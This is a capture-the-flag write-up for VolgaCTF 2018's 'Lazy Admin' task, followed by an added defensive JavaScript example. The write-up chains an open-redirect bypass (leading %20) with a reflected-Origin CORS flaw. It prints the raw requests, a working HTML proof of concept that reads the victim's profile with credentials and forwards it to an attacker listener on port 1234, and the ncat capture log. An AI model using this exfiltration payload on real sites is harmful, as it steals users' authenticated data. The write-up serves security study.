Last active: March 25, 2018 17:00
VolgaCTF Quals 2018 - Lazy Admin Writeup
<!--
Lazy Admin
This lazy admin has not authorized my account yet! Get his email, I want to write to him.
https://quals.2018.volgactf.ru/tasks
http://lazy-admin.quals.2018.volgactf.ru/
http://lazy-admin.quals.2018.volgactf.ru/robots.txt
Disallow: /unauthorized_users.txt
http://lazy-admin.quals.2018.volgactf.ru/unauthorized_users.txt
Nick:BjnjjdGonhdkG@!lf
1. Log in and remove the cookie. An unverified account is bounced from /profile.php through the redir parameter:
GET /profile.php HTTP/1.1
Host: lazy-admin.quals.2018.volgactf.ru
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://lazy-admin.quals.2018.volgactf.ru/verify.php
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=o0274jdbh8nsroa8p9oa775dv2 <--
Accept-Language: en-US,en;q=0.9,th;q=0.8
Connection: close
HTTP/1.1 302 Found
[..]
Location: /?redir=/profile.php
2. Open-redirect protection is in place: an absolute external URL is rejected.
GET /?redir=http://www.google.com HTTP/1.1
Host: lazy-admin.quals.2018.volgactf.ru
[..]
HTTP/1.1 200 OK
[..]
Redirect Error!
3. Bypass the open-redirect check with a leading %20. The server-side URL parser does not see a scheme in " http://...", but the browser still follows the Location header (see Orange Tsai's URL parser talk):
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
GET /?redir=%20http://longcatnaja HTTP/1.1
Host: lazy-admin.quals.2018.volgactf.ru
[..]
HTTP/1.1 302 Found
Date: Sun, 25 Mar 2018 10:29:43 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://longcatnaja
[...]
4. Exploit the overly permissive CORS policy. The server reflects any Origin and allows credentials, so a cross-origin page can read profile.php with the victim's session cookie:
GET /verify.php HTTP/1.1
[..]
Origin: http://ggez.com
HTTP/1.1 200 OK
[..]
Access-Control-Allow-Origin: http://ggez.com
Access-Control-Allow-Credentials: true
The verification form sends the (open-redirect) link to the admin, whose bot follows it to the attacker-hosted page:
POST /verify.php HTTP/1.1
Host: lazy-admin.quals.2018.volgactf.ru
Content-Length: 79
Cache-Control: max-age=0
Origin: http://lazy-admin.quals.2018.volgactf.ru
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://lazy-admin.quals.2018.volgactf.ru/verify.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,th;q=0.8
Cookie: PHPSESSID=o0274jdbh8nsroa8p9oa775dv2
Connection: close
link=%2F%3Fredir%3D%2520http%3A%2F%2Flongcatnaja%3A8000%2Fggez.html&submit=
The payload (ggez.html) is shown below:
-->
<!DOCTYPE html>
<html>
<head>
<meta name="author" content="Pichaya Morimoto">
<title>Overly Permissive CORS Exploit PoC - Strictly Confidential</title>
<script>
// Synchronous credentialed cross-origin read of profile.php: the server reflects
// any Origin with Access-Control-Allow-Credentials: true, so the browser attaches
// the victim's session cookie and lets this page read the response body.
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "http://lazy-admin.quals.2018.volgactf.ru/profile.php", false);
xmlhttp.withCredentials = true; // boolean, not the string "true"
xmlhttp.send();
// Forward the fetched HTML to the listener (ncat on port 1234) in the query string.
var url = "http://longcatnaja:1234/getdata.php?html=" + escape(xmlhttp.responseText);
xmlhttp.open("GET", url, true);
xmlhttp.send();
</script>
</head>
<body>
<h1>LongCat</h1>
<pre id="content"></pre>
</body>
</html>
<!--
root@sectest:~# ncat -lvp 1234 -k
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 6268 F08D F34D 489A 8388 6936 16EF 6329 4C5F 93B7
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 82.202.212.170.
Ncat: Connection from 82.202.212.170:44467.
GET /getdata.php?html=[...] HTTP/1.1
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Referer: http://longcatnaja:8000/ggez.html
Origin: http://longcatnaja:8000
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en,*
Host: longcatnaja:1234
^C
root@sectest:~#
VolgaCTF{clieNt_S1De_is_Awes0mEE_With_p@rse_Url}
-->
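As an added example that is not part of the writeup or the challenge code, here are the server-side counterparts to steps 3 and 4: a redirect validator that rejects the leading-whitespace trick (and absolute or protocol-relative URLs) and a CORS check that only echoes an Origin from an exact-match allow list instead of reflecting whatever the client sent. The function names, the ALLOWED_ORIGINS list and the example hostnames are assumptions.

```javascript
// Added example (not from the writeup). Runs under Node.js, which provides URL globally.

// Origins permitted to make credentialed cross-origin requests (assumed list).
const ALLOWED_ORIGINS = new Set(["https://app.example"]);

// CORS: echo the Origin only when it is on the exact-match allow list.
// Reflecting any Origin together with Allow-Credentials: true is what let the
// attacker page read profile.php with the admin's cookie in the challenge.
function corsHeadersFor(origin) {
  if (typeof origin !== "string" || !ALLOWED_ORIGINS.has(origin)) {
    return {}; // no ACAO header at all, so the browser blocks the cross-origin read
  }
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin", // keep caches from serving one origin's answer to another
  };
}

// Open redirect: accept only an absolute path on this site. The challenge's check
// was defeated by "%20http://..." because the server-side parser saw no scheme in
// a string starting with a space while the browser still followed the Location.
function safeRedirectTarget(redir, fallback = "/") {
  if (typeof redir !== "string") return fallback;
  // Any whitespace or control character (leading space, CRLF) is rejected outright.
  if (/[\s\x00-\x1f\x7f]/.test(redir)) return fallback;
  // Must start with a single "/": not "//host" and not "/\host" (browsers treat "\" as "/").
  if (!/^\/(?![\/\\])/.test(redir)) return fallback;
  // Resolve against a fixed base (assumed site origin) and confirm it stayed there.
  const base = "https://lazy-admin.example";
  let parsed;
  try {
    parsed = new URL(redir, base);
  } catch (e) {
    return fallback;
  }
  if (parsed.origin !== base) return fallback;
  return parsed.pathname + parsed.search;
}
```

The raw form `%20http://...` is rejected because it does not start with `/`; the decoded form (a leading space) is rejected by the whitespace check, so both ways the step 3 payload reaches the server end at the fallback path.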